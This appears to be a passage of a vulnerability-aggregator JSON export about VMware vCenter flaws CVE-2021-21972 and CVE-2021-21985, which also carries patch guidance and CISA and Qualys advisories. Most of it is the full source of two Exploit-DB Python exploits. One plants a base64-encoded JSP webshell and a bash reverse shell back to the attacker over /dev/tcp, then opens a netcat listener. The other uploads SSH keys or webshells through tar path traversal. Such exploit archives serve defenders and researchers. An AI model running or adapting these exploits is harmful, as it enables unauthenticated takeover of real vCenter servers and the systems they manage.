`/var/log/vmware/vsphere-client`\n> - vCenter Server Appliance 6.x HTML5: `/var/log/vmware/vsphere-ui`\n\nhttps://kb.vmware.com/s/article/1021804\n\n> This article provides steps to increase the size and number of the `hostd`, `vpxa`, and `vpxd` logs so that additional data is saved. This data may be useful for troubleshooting purposes.\n\nhttps://kb.vmware.com/s/article/1004795\n\n## Guidance\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](https://kb.vmware.com/s/article/83829). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\n## References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n- https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\n- https://core.vmware.com/resource/vmsa-2021-0010-faq", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "seebug", "title": "VMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-21985\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T00:00:00", "id": "SSV:99260", "href": "https://www.seebug.org/vuldb/ssvid-99260", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:37:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-24T00:00:00", "type": "exploitdb", "title": "VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-21972", "CVE-2021-21972"], "modified": "2021-06-24T00:00:00", "id": "EDB-ID:50056", "href": "https://www.exploit-db.com/exploits/50056", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 06/21/2021\r\n# Exploit Author: CHackA0101\r\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\r\n# Software Link: https://www.vmware.com/products/vcenter-server.html\r\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\r\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\r\n# CVE: 2021-21972\r\n\r\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md\r\n\r\n#!/usr/bin/python2\r\n\r\nimport os\r\nimport urllib3\r\nimport argparse\r\nimport sys\r\nimport requests\r\nimport base64\r\nimport tarfile\r\nimport threading\r\nimport time\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\nmyargs=argparse.ArgumentParser()\r\nmyargs.add_argument('-T','--target',help='The IP address of the target',required=True)\r\nmyargs.add_argument('-L','--local',help='Your local IP',required=True)\r\nargs=myargs.parse_args()\r\n\r\ndef getprompt(x):\r\n\tprint (\"(CHackA0101-GNU/Linux)$ \"+ str(x)) \r\n\r\ndef getpath(path=\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp\"):\r\n fullpath=\"../\" * 7 + path\r\n return fullpath.replace('\\\\','/').replace('//','/')\r\n\r\ndef createbackdoor(localip):\r\n # shell4.jsp\r\n backdoor = \"PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg==\"\r\n backdoor = base64.b64decode(backdoor).decode('utf-8')\r\n f = open(\"shell4.jsp\",\"w\")\r\n f.write(backdoor)\r\n f.close()\r\n # reverse.sh \r\n # After decoding overwrite string 'CUSTOM_IP' for local IP \r\n shell=\"IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE=\"\r\n shell=base64.b64decode(shell).decode('utf-8')\r\n shell=shell.replace('CUSTOM_IP',localip)\r\n f=open(\"reverse.sh\",\"w\")\r\n f.write(shell)\r\n f.close()\r\n # Move on with the payload\r\n payload_file=tarfile.open('payload.tar','w')\r\n myroute=getpath()\r\n getprompt('Adding web backdoor to archive')\r\n payload_file.add(\"shell4.jsp\", myroute)\r\n myroute=getpath(\"tmp/reverse.sh\")\r\n getprompt('Adding bash backdoor to archive')\r\n payload_file.add(\"reverse.sh\", myroute)\r\n payload_file.close()\r\n # cleaning up a little bit\r\n os.unlink(\"reverse.sh\")\r\n os.unlink(\"shell4.jsp\")\r\n getprompt('Backdoor file just was created.')\r\n\r\ndef launchexploit(ip):\r\n res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)\r\n if res.status_code == 200 and res.text == 'SUCCESS':\r\n getprompt('Backdoor was uploaded successfully!')\r\n return True\r\n else:\r\n getprompt('Backdoor failed to be uploaded. Target denied access.')\r\n return False\r\n\r\ndef testshell(ip):\r\n getprompt('Looking for shell...')\r\n shell_path=\"/ui/resources/shell4.jsp?cmd=uname+-a\"\r\n res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)\r\n if res.status_code==200:\r\n getprompt('Shell was found!.')\r\n response=res.text\r\n if True:\r\n getprompt('Shell is responsive.')\r\n try:\r\n response=re.findall(\"b>(.+)</\",response)[0]\r\n print('$>uname -a')\r\n print(response)\r\n except:\r\n pass\r\n return True\r\n else:\r\n getprompt('Sorry. Shell was not found.')\r\n return False\r\n\r\ndef opendoor(url):\r\n time.sleep(3)\r\n getprompt('Executing command.')\r\n requests.get(url, verify=False, timeout=1800)\r\n\t\r\ndef executebackdoor(ip, localip):\r\n url=\"https://\"+ip+\"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh\"\r\n t=threading.Thread(target=opendoor,args=(url,))\r\n t.start()\r\n getprompt('Setting up socket '+localip+':443')\r\n os.system('nc -lnvp 443')\r\n\r\nif len(sys.argv)== 1:\r\n myargs.print_help(sys.stderr)\r\n sys.exit(1)\r\ncreatebackdoor(args.local)\r\nuploaded=launchexploit(args.target)\r\nif uploaded:\r\n tested=testshell(args.target)\r\n if tested:\r\n executebackdoor(args.target, args.local)\r\ngetprompt(\"Execution completed!\")", "sourceHref": "https://www.exploit-db.com/download/50056", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T05:29:35", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "2021-21972"], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49602", "href": "https://www.exploit-db.com/exploits/49602", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Date: 2021-02-27\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')", "sourceHref": "https://www.exploit-db.com/download/49602", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-03-08T11:29:18", "description": "CISA has added 11 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. **Note: **to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates.\n\n**CVE ID ** | **Vulnerability Name ** | **Due Date ** \n---|---|--- \nCVE-2022-26486 | Mozilla Firefox Use-After-Free Vulnerability | 3/21/2022 \nCVE-2022-26485 | Mozilla Firefox Use-After-Free Vulnerability | 3/21/2022 \nCVE-2021-21973 | VMware vCenter Server and Cloud Foundation Server Side Request Forgery (SSRF) Vulnerability | 3/21/2022 \nCVE-2020-8218 | Pulse Connect Secure Code Injection Vulnerability | 9/7/2022 \nCVE-2019-11581 | Atlassian Jira Server and Data Center Server-Side Template Injection Vulnerability | 9/7/2022 \nCVE-2017-6077 | NETGEAR DGN2200 Remote Code Execution Vulnerability | 9/7/2022 \nCVE-2016-6277 | NETGEAR Multiple Routers Remote Code Execution Vulnerability | 9/7/2022 \nCVE-2013-0631 | Adobe ColdFusion Information Disclosure Vulnerability | 9/7/2022 \nCVE-2013-0629 | Adobe ColdFusion Directory Traversal Vulnerability | 9/7/2022 \nCVE-2013-0625 | Adobe ColdFusion Authentication Bypass Vulnerability | 9/7/2022 \nCVE-2009-3960 | Adobe BlazeDS Information Disclosure Vulnerability | 9/7/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://cyber.dhs.gov/bod/22-01/>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/03/07/cisa-adds-11-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-03-07T00:00:00", "type": "cisa", "title": "CISA Adds 11 Known Exploited Vulnerabilities to Catalog\u202f", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3960", "CVE-2013-0625", "CVE-2013-0629", "CVE-2013-0631", "CVE-2016-6277", "CVE-2017-6077", "CVE-2019-11581", "CVE-2020-8218", "CVE-2021-21973", "CVE-2022-26485", "CVE-2022-26486"], "modified": "2022-03-07T00:00:00", "id": "CISA:128CACDAC4A49084B5132404C3E20B9D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/03/07/cisa-adds-11-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| 